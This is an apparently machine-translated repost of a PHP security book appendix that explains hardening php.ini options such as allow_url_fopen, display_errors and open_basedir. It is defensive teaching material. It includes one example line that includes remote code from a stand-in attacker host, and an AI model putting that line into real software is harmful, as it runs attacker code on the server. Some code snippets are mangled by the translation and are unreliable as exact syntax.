PHP Security-configuration options

Configuration options

Although the focus of this book is on the security of the application, there are some configuration options that are familiar to any developer who cares about security. The configuration of PHP affects the behavior of the code you write and the skills you use, and you need to be slightly responsible for something other than the application if necessary.

The configuration of PHP is primarily specified by a file named PHP.ini. This file contains many configuration options, each of which has a very specific effect on PHP. If the file does not exist, or if an option in the file does not exist, the default value is used.

If you do not know where the php.ini file is located, you can use Phpinfo () to determine the file path definition in PHP:

<?php   phpinfo ();   ? >

The sixth line (the configuration file (php.ini) path shown in Figure A-1) shows the full path of the php.ini. If only the path (no file name) is displayed, this means that PHP cannot find the php.ini file in the path shown.

The file contains a very good description of itself, so you can read the file and choose the configuration options that are right for you. And the manual is more detailed, so when you need more information on an option, I recommend visiting http://www.php.cn/

Figure A-1. The Phpinfo () function can be used to locate the php.ini file

A.1. Allow_url_fopen

As the sixth chapter shows, the Allow_url_fopen option allows you to reference remote resources as if they were local files:

<?php   $contents =file_get_contents (' http://example.org/xss.html ');   ? >

In the fifth chapter, it reveals the dangers when combined with include or require:

<?php   include ' http://evil.example.org/evil.inc ';   ? >

I recommend turning off the Allow_url_fopen option unless your app needs it.

A.2. disable_functions

The disable_functions option is very useful to ensure that some potentially threatening functions cannot be used. Although it is possible to establish specifications to prohibit the use of these functions, it is much more reliable to limit the PHP configuration than to rely on the developer's adherence to the specification.

I set up a check on the functions listed in Appendix B to see if some of the functions should be restricted.

A.3. display_errors

PHP error reports can help you find errors in the code you write. When you develop your application, it is an effective way to get instant feedback, as well as to speed up development.

In a product-level application, this behavior can be a security risk. If it displays an error message, everyone can learn about important information in your app.

In the product you need to turn off the display_errors option.

A.4. Enable_dl

The ENABLE_DL option controls whether the DL () function is in effect, which allows the PHP extension to be loaded at run time.

Using the DL () function may cause an attacker to bypass the open_basedir limit, so you must disable it in your app unless it is necessary.

A.5. error_reporting

Many security breaches are caused by the use of uninitialized variables or other arbitrary programming methods. By placing PHP's error_reporting option as E_all or E_all | E_strict,php will be prompted for the above behavior. These settings are reported as errors at the notice level.

I suggest setting the error_reporting at least to E_all. (in development)

A.6. file_uploads

The File_uploads option determines whether the file is allowed to be uploaded. Therefore, if your app does not require users to upload files, turning off this option is the best option.

It is not enough to simply not process the uploaded file in PHP code, because PHP does some work before executing your code (such as generating a $_files array based on the relevant department).

A.7. log_errors

When Log_errors is set to valid, PHP writes all error messages to the file specified by the Error_log configuration option.

When Display_errors is set to invalid, it is important to set log_errors as valid, otherwise you will not be able to see the error message.

I recommend that you set log_errors as valid and set the log file location in Error_log.

A.8. MAGIC_QUOTES_GPC

MAGIC_QUOTES_GPC is a common option that is designed to prevent SQL injection. But for many reasons, including the way it escapes input, it proves to be imperfect.

It handles data in $_get, $_post, and $_cookie using the same rules as the addslashes () function. Thus, it does not use the corresponding escape function according to your database to handle.

For two main reasons, you need to set GET_MAGIC_QUOTES_GPC to invalid:

First, it increases the complexity of your input filtering logic because it edits the data first before executing your code. For example, you need to filter the names you enter, the logic is to allow only letters, spaces, hyphens, and single quotes, and when MAGIC_QUOTES_GPC is in effect, you must adapt to the name of O\ ' Reilly or use stripslashes () to try to restore it to its original shape. This unnecessary complexity (or less stringent filtering rules) increases the likelihood of errors, and the flaws in your input filtering mechanism inevitably lead to security breaches.

Second, it does not use the corresponding escape function for your database to process. That way, because it can withstand some low-level or occasional attacks, masking the fact that it's a bad filtering or escaping mechanism, leaving a security hole in your app that can't withstand more sophisticated attacks such as character set attacks.

A.9. Memory_limit

To prevent poorly written scripts from taking up all of the available memory, you can use the MEMORY_LIMIT option to limit the maximum memory usage (specified in bytes or abbreviations, such as 8M).

Although the best value is related to running applications, I recommend using the default value of 8M in most cases.

The Memory_limit option will only take effect if PHP has specified enable-memory-limit mode compilation.

A.10. Open_basedir

The Open_basedir option restricts PHP from opening files only in the directory it specifies. Although it does not replace the correct input filtering, this option reduces attacks that take advantage of file system-related functions such as include and require.

The value of this option is used as a prefix, so be careful not to miss the last slash when you want to represent the specified directory:

Open_basedir =/path/to/

Little Tips

Make sure that the ENABLE_DL option is off, otherwise the open_basedir limit may be bypassed.

a.11. register_globals

See chapter II

a.12. Safe_mode

See chapter Eighth

The above is the content of PHP security-configuration options, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

